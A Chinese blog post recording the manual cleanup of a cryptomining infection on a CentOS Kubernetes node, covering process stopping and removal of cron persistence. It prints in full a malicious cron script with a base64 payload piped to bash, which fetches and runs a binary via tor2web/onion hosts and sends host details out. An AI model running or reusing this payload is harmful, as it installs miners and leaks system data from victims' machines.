关于挖矿病毒:记录一次清理挖矿病毒

5次阅读

共计 3450 个字符,预计需要花费 9 分钟才能阅读完成。

背景

新接手了个环境,共事交接时说这些机器中过挖矿病毒还没重装,我 TM。。。
线上环境不好动,只能手动查杀了。

操作系统如下:

[root@k8s-node7 ~]# cat /etc/redhat-release 
CentOS Linux release 7.5.1804 (Core)

过程

ssh 下来,ps -ef 看到如下:

手动 kill 掉过程,很快会生成新的,猜想有守护过程。用 STOP 信号让它进行。

[root@k8s-node7 ~]# kill -STOP 165224
[root@k8s-node7 ~]# kill -STOP 223135

查看定时工作清理

[root@k8s-node7 ~]# crontab -l
8 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 ~]# cat /root/.systemd-service.sh 
#!/bin/bash
exec &>/dev/null
echo tndtCwuLieAr5wvPgknqmFZpHZWrMf+G9UhUYqmI2z2sX3NaL+fIvmN+PKEvAKMk
echo dG5kdEN3dUxpZUFyNXd2UGdrbnFtRlpwSFpXck1mK0c5VWhVWXFtSTJ6MnNYM05hTCtmSXZtTitQS0V2QUtNawpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJpNjJobW56dGZwendyaGpnMzRtNnJ1eGVtNW9lMzZudWx6bXhjZ2JkYmtpYWNldWJwcmt0YTdhZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0IG9uaW9uLmZvdW5kYXRpb24gb25pb24uY29tLmRlIG9uaW9uLnNoIHRvcjJ3ZWIuc3UgdG9yMndlYi5pbwpkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
[root@k8s-node7 ~]# rm -f !$
rm -f /root/.systemd-service.sh

而后持续清理 /var/spoon/cron//etc/crontab/etc/cron* 等目录或文件,

[root@k8s-node7 crontabs]# cd /etc/cron.d
[root@k8s-node7 cron.d]# ls
0systemd-service
[root@k8s-node7 cron.d]# cat 0systemd-service 
9 * * * * root /opt/systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 cron.d]# pwd
/etc/cron.d
[root@k8s-node7 cron.d]# rm -f 0systemd-service 

[root@k8s-node7 ~]# ll -d /etc/cron.*
drwxr-xr-x. 2 root root 4096 3 月  10 11:01 /etc/cron.d
drwxr-xr-x. 2 root root 4096 12 月 18 15:31 /etc/cron.daily
-rw-------. 1 root root    0 4 月  11 2018 /etc/cron.deny
drwxr-xr-x. 2 root root 4096 9 月  25 2019 /etc/cron.hourly
drwxr-xr-x. 2 root root 4096 6 月  10 2014 /etc/cron.monthly
drwxr-xr-x. 2 root root 4096 6 月  10 2014 /etc/cron.weekly
[root@k8s-node7 ~]# ll -d /etc/cron.*/*
-rwx------. 1 root root 219 4 月  11 2018 /etc/cron.daily/logrotate
-rwxr-xr-x. 1 root root 392 4 月  11 2018 /etc/cron.hourly/0anacron
-rwxr-xr-x. 1 root root 191 4 月  11 2018 /etc/cron.hourly/mcelog.cron

同时查看开机启动目录等,一一清理,这时候把之前 STOP 的过程 kill 掉,察看一段时间,看看是否还会自启。

正文完
linux
发表至: linux
2021-04-01
 0
关于linux:Shell脚本在当前终端添加环境变量的正确姿势
关于触摸屏:Ubuntu-Linux下开启Firefox浏览器对触屏缩放的支持
关于linux:Linux一学就会第二十二章-跳出循环shift-参数左移函数的使用
关于挖矿病毒:记录一次清理挖矿病毒

站内搜索

-「